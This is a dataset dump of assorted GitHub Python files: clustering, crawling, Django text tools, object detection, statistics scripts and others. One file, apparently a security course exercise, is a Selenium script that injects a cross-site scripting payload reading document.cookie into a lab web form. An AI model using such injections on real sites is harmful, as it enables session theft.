blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f430769b8f4c5f89e5a5f0ed787986792f63ccf0 | 55909fa57cb120260f328ba62b611569f457edeb | /dsc/uge16/garbage/assignment_clustering/task.py | e940d2d694166f2ea298beb4e13cecebb143adc8 | [] | no_license | Mutestock/cphsoft | 72886b885b6fbaad8191096982630dc9796898b8 | f0c48f11e35a493f3971e703dc5967bb1e015694 | refs/heads/master | 2023-05-07T06:05:47.177390 | 2021-06-02T14:20:03 | 2021-06-02T14:20:03 | 335,205,773 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,959 | py | import joblib
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.cluster import KMeans
from scipy.spatial.distance import cdist
print("#======= Data Preparation =======#")
df = pd.read_csv("data/cluster_data.csv", header=None)
X = df.values
RESOURCES_DIRECTORY = "resources"
CLUSTER_COUNT = 4
def make_scatterplot(X=X):
# Plot the input data
# a. creates figure
plt.figure()
plt.title('Input data')
# b. get the range of X and Y (long way)
# first column
x_min = X[:, 0].min()
x_max = X[:, 0].max()
# second column
y_min = X[:, 1].min()
y_max = X[:, 1].max()
# same as above: get the range of X and Y (short way)
# x_min, x_max = X[:, 0].min(), X[:, 0].max()
# y_min, y_max = X[:, 1].min(), X[:, 1].max()
# c. set plot limits
plt.xlim(x_min - 1, x_max + 1)
plt.ylim(y_min - 1, y_max + 1)
# plot the points
plt.scatter(X[:,0], X[:,1], marker='o', facecolors='none', edgecolors='black', s=30)
plt.savefig(f'{RESOURCES_DIRECTORY}/scatterplot_1.jpeg', bbox_inches='tight')
plt.close()
def make_scatterplot_with_boundaries(X=X):
kmeans = KMeans(init='k-means++', n_clusters=CLUSTER_COUNT, n_init=20)
# init: method of experimemtal finding the initial location of the centroids
# n_init: the algorithm will run n_init times with different cetroids and the best result of those will be taken
# Train the KMeans clustering model
kmeans.fit(X)
# we need a grid of points for drawing a smooth border between clusters
# define step size of the mesh
step_size = 0.01
# we need to cover all points of our data
# create a grid out of an array of X values and an array of y values
x_min = X[:, 0].min()
x_max = X[:, 0].max()
# second column
y_min = X[:, 1].min()
y_max = X[:, 1].max()
x_coord = np.arange(x_min, x_max, step_size)
y_coord = np.arange(y_min, y_max, step_size)
# meshgrid() creates a matrix of coordinates from the two vectors of coordinates
x_vals, y_vals = np.meshgrid(x_coord, y_coord)
# Predict cluster labels for all the points on the grid
# ravel() returns 1D-array
xx = x_vals.ravel()
yy = y_vals.ravel()
# np.c_ concatenates the arguments
labels = kmeans.predict(np.c_[xx,yy])
labels = labels.reshape(x_vals.shape)
print("Labels:\n", labels)
# Plot the clusters
# create new plot area
plt.figure()
# clear the plot area
plt.clf()
plt.title('Boundaries of clusters')
# plot the frame
plt.xlim(x_min, x_max)
plt.ylim(y_min, y_max)
# plot the clusters
plt.imshow(labels, interpolation='nearest',
extent=(x_vals.min(), x_vals.max(), y_vals.min(), y_vals.max()),
cmap='viridis', aspect='auto')
# plot the points as they belong to the clusters
plt.scatter(X[:,0], X[:,1], marker='o', facecolors='none', edgecolors='white', s=30)
# plot the centroids
centers = kmeans.cluster_centers_
plt.scatter(centers[:,0], centers[:,1], s=200, linewidths=2, color='yellow', marker='*', zorder=3, facecolors='black')
# annotate the centroids
for i, center in enumerate(centers):
plt.annotate(i, center+[0.0,1.0],
size=15, zorder=1, color='yellow', weight='bold',
horizontalalignment='center', verticalalignment='center',)
plt.savefig('resources/scatterplot_with_boundaries.jpeg', bbox_inches='tight')
plt.close()
## Determine K by Elbow and Silouette Methods
# Determine k by minimizing the distortion -
# the sum of the squared distances between each observation vector and its centroid
def make_wcss(one, two, X):
K = range(one,two)
distortions = []
for k in K:
model = KMeans(n_clusters=k).fit(X)
model.fit(X)
distortions.append(sum(np.min(cdist(X, model.cluster_centers_, 'euclidean'), axis=1)) / X.shape[0])
return distortions
def scatter_elbow(X=X):
print("> Generated Scatterplot")
#make_scatterplot(X)
print("\n======= Step 3: Implement KMeans Algorithm for Training a Prediction Model ======")
wcss = make_wcss(1, 10, X)
print("> Generated WCSS:\n", wcss)
plt.plot(range(1, 10), wcss)
plt.title('Elbow Method')
plt.xlabel('Number of clusters')
plt.ylabel('WCSS')
plt.savefig('resources/scatterplot_elbow.jpeg', bbox_inches='tight')
plt.close()
def cluster_stuff():
# Optimal number of clusters K
CLUSTER_COUNT = 4 # In our case it's 4
# Create an instance of KMeans classifier
kmeans = KMeans(init='k-means++', n_clusters=CLUSTER_COUNT, n_init=20)
# init: method of experimemtal finding the initial location of the centroids
# n_init: the algorithm will run n_init times with different cetroids and the best result of those will be taken
# Train the KMeans clustering model
kmeans.fit(X)
print("> Kmeans", kmeans)
print("\n====== Implement the Trained Model for Prediction =======")
y_pred = kmeans.predict(X)
print("> y predicted:\n", y_pred)
# See the predicted labels of clusters
# cluster labels are stored in variable 'kmeans.labels_'
print("> kmeans labels:\n", kmeans.labels_)
arr = []
print("\n======= Review the Results =======")
# Split the clusters, for demo purpose only
for i in range(CLUSTER_COUNT):
# slice the cluster
cluster = X[y_pred == i]
# print the shape
print("Cluster ", i, ": ", cluster.shape)
# plot the points of this cluster
plt.scatter(cluster[:, 0], cluster[:, 1])
plt.grid(True)
plt.title("Cluster " + str(i) + ": " + str(cluster.shape))
file_name = f'scatterplot_cluster_{str(i)}.jpeg'
plt.savefig("resources/" + file_name, bbox_inches='tight')
arr.append(file_name)
plt.close()
return arr
# Plot the points with color code of the predicted clusters
# viridis - a color map, https://matplotlib.org/users/colormaps.html
# s - marker size, here, the dots size
# c - marker color, here taken from the predicted clusters
def scatterplot_all_clustered(X=X):# Create an instance of KMeans classifier
# Optimal number of clusters K
CLUSTER_COUNT = 4 # In our case it's 4
kmeans = KMeans(init='k-means++', n_clusters=CLUSTER_COUNT, n_init=20)
kmeans.fit(X)
print("> All Clusters in One Plot")
plt.scatter(X[:,0], X[:,1])
centers = kmeans.cluster_centers_
plt.scatter(centers[:, 0], centers[:, 1], s=300, c='red')
plt.title('All Clusters in One Plot w/ centers')
print(kmeans.cluster_centers_)
plt.savefig('resources/scatterplot_with_all_clusters.jpeg', bbox_inches='tight')
plt.close()
#print("\n======= Print Bondaries of Clusters ========")
#make_scatterplot_with_boundaries(X)
#print("\n======== Store the model in a file ========")
#joblib.dump(kmeans, 'model/kmmodel.pkl') | [
"doublenegative@protonmail.com"
] | doublenegative@protonmail.com |
3804bf933ae550237c35e79bfbe044ab37add67d | f9ddaef2b0f5fdb684b1ab0c251e6a3eabbf740d | /hello_world.py | d34d0fdbd8a3c771b190667d54eb26c424a42b6c | [] | no_license | ruthmartin16/hello_world | 808806e47ce1143d3b692b4f3a9115b6e761e9de | 73692d5b9a120f8f7e408800cf7213e329c197f9 | refs/heads/master | 2021-01-13T12:06:44.046861 | 2017-01-03T01:13:48 | 2017-01-03T01:13:48 | 77,869,899 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 72 | py | print "Hello world?"
"111"ere is some function I'm working on"
fdsafdsa | [
"leibs@colorado.edu"
] | leibs@colorado.edu |
0bf5a8c6326903b1d13c14f70c5cecc7758378aa | 0ed2c666d4e79a9fd3acce710af120556d01a1f2 | /assignment2/scripts/exploit16/exploit16.py | 50d320aef19e2f8c05725d44e5f7f5655c9f1983 | [
"MIT"
] | permissive | vhazali/cs5331 | 63a0f76729b02d4d700489ff2d8a3b02f1a995e8 | 3b3618aaa17199ebcd3c01bc6c25ddbdbe4f3d0f | refs/heads/master | 2021-01-20T01:06:13.830017 | 2017-04-24T10:13:32 | 2017-04-24T10:13:32 | 89,224,813 | 8 | 6 | null | null | null | null | UTF-8 | Python | false | false | 564 | py | from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
caps = DesiredCapabilities.FIREFOX
caps["marionette"] = True
caps["binary"] = "/usr/bin/firefox"
driver = webdriver.Firefox(capabilities=caps,executable_path='./exploit16/geckodriver')
driver.get("http://www.wsb.com/Assignment2/case16/controller.php")
elem = driver.find_element_by_id("msg")
elem.send_keys('";alert(document.cookie);"')
btn = driver.find_element_by_id("send")
btn.click()
driver.close()
| [
"victorhazali@gmail.com"
] | victorhazali@gmail.com |
ebf0492a6d3f90568a7c6772fbdcd5413c236a4c | 5957bf2a9abb6b73171015ae320fd727470a4b30 | /fabbrica/company/helpers.py | 5adee6cf186e6ab24a25405fca1dc3656cfe9540 | [] | no_license | bhavishyasharma/fabbrica-api | 13bb22d7020dd79d34b566ae0c4d8eee4d0fb005 | ceb0f0959468c2bcc65bd719a00828fd1843c6ac | refs/heads/master | 2022-04-14T05:53:16.306612 | 2020-04-14T22:14:59 | 2020-04-14T22:14:59 | 254,918,457 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 660 | py | from mongoengine.errors import DoesNotExist
from .model import CompanyModel
from fabbrica.acl.model import AclModel
from fabbrica.machine.model import MachineModel
def updateAcl(company:CompanyModel):
machines = MachineModel.objects(company=company).all()
for machine in machines:
for user in company.users:
try:
acl = AclModel.objects(clientid=str(machine.id),username=user.username, publish=str(machine.id)).get()
except DoesNotExist:
acl = AclModel(username=user.username, clientid=str(machine.id), publish=[str(machine.id)], subscribe=[""], pubsub=["#"])
acl.save()
| [
"bhavishyasharma@live.com"
] | bhavishyasharma@live.com |
8c14f4d248c435521ebd826dc33f5a9e2a201049 | a3655505e846d819a34f26e311199de6d76cfc40 | /online_inference/tests/conftest.py | 0bb571660e5777e4b5c7ef0c9994b183f979d8bb | [] | no_license | StepDan23/MADE_ml_in_prod | 1defb98f183b0dd6c4e7158b8f213be7d5354c3a | 694dd733b61cae244587d8c617ae6c21d6181821 | refs/heads/master | 2023-06-02T00:29:53.938778 | 2021-06-24T09:27:04 | 2021-06-24T09:27:04 | 381,957,243 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,194 | py | import pytest
@pytest.fixture()
def faker_seed():
return 42
@pytest.fixture
def fake_dataset(faker):
data = [faker.json(
data_columns=[
('idx', 'pyint', {'min_value': 50, 'max_value': 100}),
('age', 'pyint', {'min_value': 0, 'max_value': 120}),
('sex', 'pyint', {'min_value': 0, 'max_value': 1}),
('cp', 'pyint', {'min_value': 0, 'max_value': 3}),
('trestbps', 'pyint', {'min_value': 20, 'max_value': 250}),
('chol', 'pyint', {'min_value': 0, 'max_value': 1000}),
('fbs', 'pyint', {'min_value': 0, 'max_value': 1}),
('restecg', 'pyint', {'min_value': 0, 'max_value': 2}),
('thalach', 'pyint', {'min_value': 20, 'max_value': 250}),
('exang', 'pyint', {'min_value': 0, 'max_value': 1}),
('oldpeak', 'pyfloat', {'min_value': 0.0, 'max_value': 10.0}),
('slope', 'pyint', {'min_value': 0, 'max_value': 2}),
('ca', 'pyint', {'min_value': 0, 'max_value': 4}),
('thal', 'pyint', {'min_value': 0, 'max_value': 3}),
], num_rows=1
).replace("[", "").replace("]", "") for _ in range(100)]
return data
| [
"stepdan23@yandex-team.ru"
] | stepdan23@yandex-team.ru |
f4311e631988959593b4909a623382340cb980ca | 89fb56bcd983a07b52ed741977a44eb9f15dabe8 | /Crawler/CrawledArticle_Demo.py | 65943f67a936d9539d792307417df6e92f638d17 | [] | no_license | GokhanIrmak/PythonBasics-Demos | fa4574c21c9eb5055ebdcab0ed91570b5dd27fd2 | dd14bbddc0d58815de347fe2c127c9c0f2c2732e | refs/heads/main | 2023-05-05T03:52:44.833881 | 2021-05-29T13:22:07 | 2021-05-29T13:22:07 | 349,741,370 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,295 | py | import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin
class CrawledArticle():
def __init__(self, title, emoji, content, image):
self.title = title
self.emoji = emoji
self.content = content
self.image = image
class ArticleFetcher():
def fetch(self):
url = "http://python.beispiel.programmierenlernen.io/index.php"
r = requests.get(url)
doc = BeautifulSoup(r.text, "html.parser")
articles = []
for card in doc.select(".card"):
emoji = card.select_one(".emoji").text
content = card.select_one(".card-text").text
title = card.select(".card-title span")[1].text
imageUrl = card.select_one("img").attrs["src"]
image = urljoin(url,imageUrl)
crawled = CrawledArticle(title, emoji, content, image)
articles.append(crawled)
return articles
# print(r.status_code)
# print(r.headers)
# print(r.text)
# for p in doc.find_all("p"):
# print(p.text)
# print(p.attrs) #Print attributes of 'p'
# Selecting with CSS Selectors
# cards = doc.select(".card")
# print(cards)
# emojis = doc.select(".emoji")
# print(emojis)
fetcher = ArticleFetcher()
fetched = fetcher.fetch()[0]
print(fetched.image)
| [
"gokhanirmak2@hotmail.com"
] | gokhanirmak2@hotmail.com |
5762b55809127ad9cde6e4a808cc5ab6a4b2b3ae | d336a8e159517b5f27277be7c2d47effb5cf98de | /my-text-utils/views.py | d54d1c05d1dbc69bdec613963c5cf7bac5052491 | [] | no_license | bhavy285/My-text-utils | 418179c3efc2854b1badfd260df96a845f0ce3b8 | 59fcc089e68b9a8ed34f669370596c0c4d7f0f7c | refs/heads/main | 2023-06-04T02:13:29.544098 | 2021-06-19T04:18:28 | 2021-06-19T04:18:28 | 378,320,103 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,652 | py | from typing import Counter
from django import http
from django.http import HttpResponse
from django.shortcuts import render
# def het(request):
# return HttpResponse('''<h1>this is Het</h1><br> <a href="https://www.instagram.com/direct/inbox/" >insta bhavy shah</a>''')
# def hitul(request):
# return HttpResponse("this is hitul shah")
def index(request):
# return HttpResponse('''<h1> home</h1> <br> <a href="removepunc">removepunc </a><br><a href="newline">newline </a> ''')
# params = {'name' : 'Bhavy' , 'place' : 'Neptune'}
# return render(request,'index.html' ,params)
return render(request, 'index.html')
def analyzer(request):
# we get the text
djtext = request.POST.get('text', 'default')
# for the checkbox
removepunc = request.POST.get('removepunc', 'off')
capslock = request.POST.get('capslock', 'off')
linere = request.POST.get('linere', 'off')
spacecl = request.POST.get('spacecl', 'off')
exspcl = request.POST.get('exspcl', 'off')
chacou = request.POST.get('chacou', 'off')
# print(request.GET.get('removepunc' , 'default'))
# print(djtext)
# print(removepunc)
if removepunc == "on":
punctions = ''' !()-[]{}/*-`<>/?;:='",.@#$%^&*()-_++'''
analyzed = ""
for char in djtext:
if char not in punctions:
analyzed = analyzed + char
params = {'purpose': 'removed punctions', 'analyzed_text': analyzed}
djtext = analyzed
# return render(request, 'analyzer.html' ,params)
# here very import note that
# we have always make the same name at index.html and in views.py
# here in index.html we gave the capslock name so in views.py we have to give that name complasary
if(capslock == 'on'):
analyzed = ""
for char in djtext:
analyzed = analyzed + char.upper()
params = {'purpose': 'capatize it', 'analyzed_text': analyzed}
djtext = analyzed
# return render(request, 'analyzer.html' ,params)
if(linere == 'on'):
analyzed = ""
for char in djtext:
if char != "\n" and char != '\r':
analyzed = analyzed + char
params = {'purpose': 'newline remover ', 'analyzed_text': analyzed}
djtext = analyzed
# return render(request, 'analyzer.html' ,params)
if(spacecl == 'on'):
analyzed = ""
for char in djtext:
if char != " ":
analyzed = analyzed + char
params = {'purpose': 'space remover ', 'analyzed_text': analyzed}
djtext = analyzed
# return render(request, 'analyzer.html' ,params)
if(exspcl == 'on'):
analyzed = ""
for index, char in enumerate(djtext):
if not (djtext[index] == " " and djtext[index + 1] == " "):
analyzed = analyzed + char
params = {'purpose': 'extra space remover ', 'analyzed_text': analyzed}
djtext = analyzed
# return render(request, 'analyzer.html' ,params)
if(chacou == 'on'):
analyzed = len(djtext)
params = {'purpose': 'character counter ', 'analyzed_text': analyzed}
djtext = analyzed
# return render(request, 'analyzer.html' ,params)
return render(request, 'analyzer.html', params)
# else:
# return HttpResponse("Error")
# return HttpResponse("this is remove page")
# def newline(request):
# return HttpResponse("this is new line")
# def analyzer(request):
# return HttpResponse("this is analyzer")
| [
"noreply@github.com"
] | bhavy285.noreply@github.com |
ea90e3d2000a6d79995394c0b952a7b27684d6ed | 622540c6cea183081b8e9285d6d13e085ba772ba | /rango/bing_search.py | 35ac5b2f1dd9868d7fdec605c3111801c16a8fe1 | [] | no_license | GeorgiosGoulos/Rango | 6112882b6026b2d7428e4af069fd963e00e9036a | 5bf890c7a2991f3d07c28d0fa95de3aa41dd5d38 | refs/heads/master | 2021-01-22T06:37:48.687869 | 2015-03-26T18:25:32 | 2015-03-26T18:25:32 | 29,824,310 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,976 | py | import json
import urllib
import urllib2
import sys # for encoding purposes, see main()
from rango_keys import BING_API_KEY
def run_query(search_terms):
# Specify the base
root_url = 'https://api.datamarket.azure.com/Bing/Search/'
source = 'Web'
# Specify how many results we wish to be returned per page.
# Offset specifies where in the results list to start from.
# With results_per_page = 10 and offset = 11, this would start from page 2.
results_per_page = 4
offset = 0
# Wrap quotes around our query terms as required by the Bing API.
# The query we will then use is stored within variable query.
query = "'{0}'".format(search_terms)
query = urllib.quote(query)
# Construct the latter part of our request's URL.
# Sets the format of the response to JSON and sets other properties.
search_url = "{0}{1}?$format=json&$top={2}&$skip={3}&Query={4}".format(
root_url,
source,
results_per_page,
offset,
query)
# Setup authentication with the Bing servers.
# The username MUST be a blank string, and put in your API key!
username = ''
# Create a 'password manager' which handles authentication for us.
password_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
password_mgr.add_password(None, search_url, username, BING_API_KEY)
# Create our results list which we'll populate.
results = []
try:
# Prepare for connecting to Bing's servers.
handler = urllib2.HTTPBasicAuthHandler(password_mgr)
opener = urllib2.build_opener(handler)
urllib2.install_opener(opener)
# Connect to the server and read the response generated.
response = urllib2.urlopen(search_url).read()
# Convert the string response to a Python dictionary object.
json_response = json.loads(response)
# Loop through each page returned, populating out results list.
for result in json_response['d']['results']:
results.append({
'title': result['Title'],
'link': result['Url'],
'summary': result['Description']})
# Catch a URLError exception - something went wrong when connecting!
except urllib2.URLError, e:
print "Error when querying the Bing API: ", e
# Return the list of results to the calling function.
return results
def main():
query = raw_input("Enter your query: ")
results = run_query(query)
for result in results:
if 'title' in result:
print "Title:", result['title']
if 'link' in result:
print 'Link:', result['link']
if 'summary' in result:
print 'Summary:', result['summary'].encode(sys.stdout.encoding, errors='replace')
for key in result:
if key not in ('title', 'link', 'summary'):
print str(key) + ":", result[key]
print
print "Done"
if __name__ == '__main__':
main() | [
"georgiosagou@gmail.com"
] | georgiosagou@gmail.com |
087dc56facc468713381222dde079cabb5399127 | 64d4b5c45fa50d3cc5b4bc77ced577d96d97be7b | /List/list-1.py | 3ad785a959dec38d8462df2943a7dfab58026dfe | [] | no_license | anshu-pathak/python-basic | 30b610dcba0fdcf490557eae65bdf2343d37aae7 | 368a330e1744e266892e196c30b2e37dac5ddd09 | refs/heads/main | 2023-02-18T20:27:58.958833 | 2021-01-17T16:57:44 | 2021-01-17T16:57:44 | 314,469,075 | 1 | 0 | null | 2020-12-04T14:06:40 | 2020-11-20T06:43:07 | Python | UTF-8 | Python | false | false | 73 | py | # declare a list.
myList = ["apple", "banana", "mango"]
print(myList)
| [
"anshu.pathak@logicielsolutions.co.in"
] | anshu.pathak@logicielsolutions.co.in |
8cca55d1ad2f671b929fe8344281b5cd67f71880 | d26ccea37676da626c4117ec539146fcf66b817b | /BackEND/Week11-Day02/app.py | bcb7d22f0c243e432d6a423ef4f3e1d9272e6101 | [] | no_license | Emrah611/PragmatechFoundationProject | eef9613858401d01d6656f63750a70eeecdfb5a0 | 4cfed0cf957d262a65cad2c1080f078456bff9cf | refs/heads/main | 2023-05-20T01:41:22.155481 | 2021-06-16T14:02:00 | 2021-06-16T14:02:00 | 348,273,850 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,500 | py |
from flask import Flask, render_template, request, redirect, url_for
from flask_sqlalchemy import SQLAlchemy
from os.path import join, dirname, realpath, os
from sqlalchemy.orm import backref
from werkzeug.utils import secure_filename
UPLOAD_FOLDER = join(dirname(realpath(__file__)), 'static/uploads/')
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///data.db'
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
db = SQLAlchemy(app)
class Customer(db.Model):
id = db.Column(db.Integer,primary_key=True)
name = db.Column(db.String(50),nullable=False)
email = db.Column(db.String,unique=True)
image = db.Column(db.String(20),default = 'customer.jpg')
age = db.Column(db.Integer,nullable=False)
orders = db.relationship('Order',backref='owner',lazy = True)
def __repr__(self):
return f'Customer {self.name}'
class Order(db.Model):
id = db.Column(db.Integer,primary_key=True)
title = db.Column(db.String(50),nullable=False)
short_description = db.Column(db.String(50),nullable=False)
description = db.Column(db.Text,nullable = False)
image = db.Column(db.String(20),default = 'image.png')
customer_id = db.Column(db.Integer,db.ForeignKey('customer.id'),nullable=False)
def __repr__(self):
return f'Order {self.title}'
@app.route('/')
def index():
customers = Customer.query.all()
return render_template('index.html', customers=customers)
if __name__=='__main__':
app.run(debug=True) | [
"bey_emrah@mail.ru"
] | bey_emrah@mail.ru |
2950ec6a8d2837d53498fe9bf3c20caeaab8832f | ea9ea4a276970ecc0f5156a192d93195b4d3428a | /my_object_capture.py | 11701d0b286fe7a11f37a279dd73db1367f40e56 | [] | no_license | pmcbride/coral-webcam-detection | 34a393a1039a02206878a848e2388e23a0885db6 | 014106414d19f430528f8fc9ab0e9e88398d5fc9 | refs/heads/master | 2020-06-28T19:55:30.314700 | 2019-08-09T06:04:56 | 2019-08-09T06:04:56 | 200,326,091 | 6 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,657 | py | import argparse
import io
import time
import RPi.GPIO as IO
from edgetpu.detection.engine import DetectionEngine
from edgetpu.utils import dataset_utils
from imutils.video import VideoStream
from PIL import Image
import numpy as np
import imutils
import cv2
parser = argparse.ArgumentParser()
parser.add_argument(
'--model', help='File path of Tflite model.', required=True)
parser.add_argument('--label', help='File path of label file.', required=True)
parser.add_argument('--confidence', help='Minimum probability to filter weak detections.', type=float, default=0.3)
args = parser.parse_args()
labels = dataset_utils.ReadLabelFile(args.label)
model = DetectionEngine(args.model)
IO.cleanup()
IO.setmode(IO.BOARD)
IO.setup(40, IO.OUT)
IO.setup(38, IO.OUT)
with VideoStream(src=0).start() as vs:
#vs = VideoStream(src=0).start()
time.sleep(2)
# Loop over the frames from the video stream
while True:
found_person = False
# grab the frame from the threaded video stream and resize it
# to have a maximum width of 500 pixels
frame = vs.read()
frame = imutils.resize(frame, width=500)
orig = frame.copy()
# prepare the frame for classification by converting (1) it from
# BGR to RGB channel ordering and then (2) from a NumPy array to
# PIL image format
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
frame = Image.fromarray(frame)
# make predictions on the input frame
start = time.time()
results = model.DetectWithImage(frame, threshold=args.confidence, keep_aspect_ratio=True, relative_coord=False)
end = time.time()
# ensure at least one result was found
for r in results:
# extract the bounding box and box and predicted class label
box = r.bounding_box.flatten().astype("int")
(startX, startY, endX, endY) = box
label = labels[r.label_id]
if label=="person":
found_person = True
# draw the bounding box and label on the image
cv2.rectangle(orig, (startX, startY), (endX, endY), (0, 255, 0), 2)
y = startY - 15 if startY - 15 > 15 else startY + 15
text = "{}: {:.2f}%".format(label, r.score * 100)
cv2.putText(orig, text, (startX, y), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 2)
# show the output frame and wait for a key press
cv2.imshow("Frame", orig)
key = cv2.waitKey(1) & 0xFF
if found_person==True:
IO.output(40, 1)
IO.output(38, 0)
else:
IO.output(40, 0)
IO.output(38, 1)
# if the `q` key was pressed, break from the loop
if key == ord("q"):
break
# do a bit of cleanup
cv2.destroyAllWindows()
vs.stop()
IO.cleanup()
| [
"pmmcbride@gmail.com"
] | pmmcbride@gmail.com |
744050f54c6b4fd67c0c7cceee5792ae2aba7de2 | 18b26ccde6a5fb823185e2fe17e708c8718bcfd6 | /Python Crash Course/statistics_practice.py | 2e474684a58d13694cd8fa9a889d831386144f43 | [] | no_license | huskydj1/CSC_630_Machine_Learning | 9245bab12df131afc1463f880df877b6a7013dcc | a13e51983847ad4e7069982f07da60bde5eb9951 | refs/heads/main | 2023-08-24T20:45:14.712870 | 2021-11-04T02:21:23 | 2021-11-04T02:21:23 | 424,351,946 | 0 | 0 | null | 2021-11-03T19:18:45 | 2021-11-03T19:18:45 | null | UTF-8 | Python | false | false | 1,184 | py | from functools import reduce
import numpy as np
a = [11, 16, 14, 19, 1, 13, 15, 15, 2, 6, 4, 20, 17, 8, 18, 22, 25, 11, 18, -7]
b = [17, 15, 7, 12, 5, 20, 18, 22, 11, 2, 9, 0, 10, 11, 6, 17, 9, 10, 6]
c = [6, 16, 1, 6, 14, 5, 5, 15, 6, 11, 8, 15, 10, 3, 15, 10, 5, 14, 17, 13]
d = a+b+c
def mean(list):
# sum = reduce(lambda a,b: a+b, list)
return sum(list) / len(list)
def median(list):
list.sort()
return (list[(len(list)-1)//2]+list[(len(list))//2])/2
def single_mode(list):
return max(list, key=list.count)
def mode(l):
d = {}
max = 0
for i in l:
if i not in d.keys():
d[i] = 1
if max == 0:
max = 1
else:
d[i] += 1
if d[i] > max:
max = d[i]
return [k for k,v in d.items() if v==max]
def my_stdev(l):
avg = mean(l)
return (sum(list(map(lambda x: (x-avg)**2, l)))/len(l))**0.5
print(mean(a))
print(mean(b))
print(mean(c))
print(single_mode(a))
print(single_mode(b))
print(single_mode(c))
print(mode(a))
print(mode(b))
print(mode(c))
print(median(a))
print(median(b))
print(median(c))
print(mean(d))
print(my_stdev(d))
print(np.std(d)) | [
"williamy330@gmail.com"
] | williamy330@gmail.com |
66a564f0ce6fffe5cbf5bd290c3ec0ee367c35ff | bb46e44301da95b8ed1b2b3af6caf8ef6f0e91f2 | /scripts/NationalityCalculator.py | c2f92c72943e5a7a3db782d1e1dce71948b0f88f | [] | no_license | vgoel30/European-Soccer-Diversity | ccca31a2233e19cd304d5c3d7cb80413d01aa359 | a62364e3876cecf074a8aee2ea8976bf7a9c5576 | refs/heads/master | 2021-03-24T13:20:22.569083 | 2018-06-10T10:48:31 | 2018-06-10T10:48:31 | 117,543,936 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,027 | py | from pprint import pprint
import json
import pandas as pd
from sklearn import preprocessing
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
import math
def plot_time_series(df, title):
#plot graph
ax = df.plot(figsize=(12,8),marker='o')
#set title
plt.title(title, fontsize=13)
#set ticks roatation
plt.xticks(rotation=50)
ax.set_ylabel('Percentages')
ax.set_ylim(top=50)
ax.set_ylim(bottom=0)
plt.show()
def minutes_parser(minutes_string):
if minutes_string == '-':
return 0
return int(minutes_string.replace('\'','').replace('.',''))
def get_nationalities_df():
years = [str(year) for year in range(1995, 2017)]
countries = ['England', 'France', 'Germany', 'Italy', 'Spain']
final_data = []
for country in countries:
final_data.append([])
for year in years:
final_data[-1].append(0)
for year in years:
total = 0
for country in countries:
data_file = '../data/Leistungsdaten/' + str(country) + '/2016.json'
with open(data_file) as datafile:
data = json.load(datafile)
#data for a particular year
league_year_data = data[year]
#go trhough each team in the year
for team in league_year_data:
year_data = data[year][team]
#each player
for key in year_data:
player = year_data[key]
player_country = player['nationality']
if player_country in countries:
final_data[countries.index(player_country)][int(year) - 1995] += 1
total += 1
for country in countries:
final_data[countries.index(country)][int(year) - 1995] /= total
final_data[countries.index(country)][int(year) - 1995] *= 100
L_all_data = final_data
df = pd.DataFrame({'England': L_all_data[0],
'France': L_all_data[1],
'Germany': L_all_data[2],
'Italy' : L_all_data[3],
'Spain' : L_all_data[4],
'Year': years })
df = df.set_index('Year')
return df
df = get_nationalities_df()
pprint(df)
plot_time_series(df, 'Percentage of nationalies') | [
"varun.goel@stonybrook.edu"
] | varun.goel@stonybrook.edu |
b366b7434089c0ba3d1eb986f724eeeaa900c568 | b2cfb6de4d1a4a00ac11d1aabab3caa485c8ecb9 | /sodp/reports/migrations/0020_auto_20210805_1639.py | 1984c338693fd39179fcd0a21ed21cfdebc7efb0 | [
"Apache-2.0"
] | permissive | ElHombreMorado8/sodp | d80c6057b68c7edb843f37b4bd2dcfa6638ab6f6 | e4a05620b633d261b22025af1d488cf767ba2e30 | refs/heads/main | 2023-07-17T08:19:10.352314 | 2021-09-02T17:18:37 | 2021-09-02T17:39:09 | 394,760,640 | 0 | 0 | Apache-2.0 | 2021-08-10T19:28:20 | 2021-08-10T19:28:19 | null | UTF-8 | Python | false | false | 900 | py | # Generated by Django 3.1.12 on 2021-08-05 16:39
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('reports', '0017_auto_20210728_2110'),
]
operations = [
migrations.CreateModel(
name='reportURL',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('url', models.CharField(blank=True, max_length=100, null=True, verbose_name='url')),
('is_accepted_status', models.CharField(blank=True, choices=[('accept', 'Accept'), ('block', 'Block')], default='', max_length=6)),
